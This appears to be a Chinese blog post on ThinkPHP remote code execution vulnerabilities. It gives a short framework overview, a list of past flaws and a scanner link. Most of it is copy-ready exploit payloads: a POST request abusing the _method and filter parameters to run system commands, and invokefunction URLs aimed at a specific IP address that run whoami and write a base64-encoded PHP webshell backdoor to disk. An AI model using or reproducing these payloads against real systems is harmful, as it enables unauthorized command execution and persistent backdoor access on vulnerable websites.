Thinkphp漏洞
2023-03-29 23:03:03
250
{{single.collect_count}}

➢ Thinkphp介绍
ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,支持
windows/Unix/Linux等服务器环境。

➢ Thinkphp应用
很多cms就是基于thinkphp二次开发的,所以thinkphp出问题的话,会影响很多基于thinkphp开发的网站。在这里插入图片描述
➢历史漏洞
ThinkPHP3.2.3_缓存函数设计缺陷可导致Getshell
ThinkPHP5_SQL注入漏洞&&敏感信息泄露
ThinkPHP3.2.3_最新版update注入漏洞
ThinkPHP5.0.10缓存函数设计缺陷可导致Getshell
ThinkPHP3.2.X_find_select_delete注入
ThinkPHP框架5.0.X_sql注入漏洞分析
ThinkPHP3.X_order_by注入漏洞
ThinkPHP5.X_order_by注入漏洞
ThinkPHP5.X_远程代码执行

➢ Thinkphp特征
在这里插入图片描述
在这里插入图片描述
➢漏洞检测
https://github.com/Lucifer1993/TPscan在这里插入图片描述
➢漏洞简介( 5.0.23)
其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可
以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。

➢漏洞利用( (命令执行) )
POST /index.php?s=captcha
Data:
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id在这里插入图片描述
➢漏洞利用( (命令执行) )
POST /index.php?s=captcha
Data:
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=
echo -n YWFhPD9waHAgQGFzc2VydCgkX1BPU1RbJ3hzcyddKTs/PmJiYg== |
base64 -d > shell9.php

➢漏洞简介( 5.0.22/5.1.29)
其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下
(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。

➢漏洞利用(代码执行)
http://47.104.255.11:9001/index.php?s=/Index/\think\app/invokefunction&function=
call_user_func_array&vars[0]=phpinfo&vars[1][]=-1在这里插入图片描述
➢漏洞利用(命令执行)
http://47.104.255.11:9001/index.php?s=/Index/\think\app/invokefunction&function=
call_user_func_array&vars[0]=system&vars[1][]=whoami在这里插入图片描述
➢漏洞利用(写 webshell)
http://47.104.255.11:9001/index.php?s=/Index/\think\app/invokefunction&function=
call_user_func_array&vars[0]=system&vars[1][]=echo -n
YWFhPD9waHAgQGFzc2VydCgkX1BPU1RbJ3hzcyddKTs/PmJiYg== | base64 -d > shell9.php在这里插入图片描述

回帖
全部回帖({{commentCount}})
{{item.user.nickname}} {{item.user.group_title}} {{item.friend_time}}
{{item.content}}
{{item.comment_content_show ? '取消' : '回复'}} 删除
回帖
{{reply.user.nickname}} {{reply.user.group_title}} {{reply.friend_time}}
{{reply.content}}
{{reply.comment_content_show ? '取消' : '回复'}} 删除
回帖
收起
没有更多啦~
{{commentLoading ? '加载中...' : '查看更多评论'}}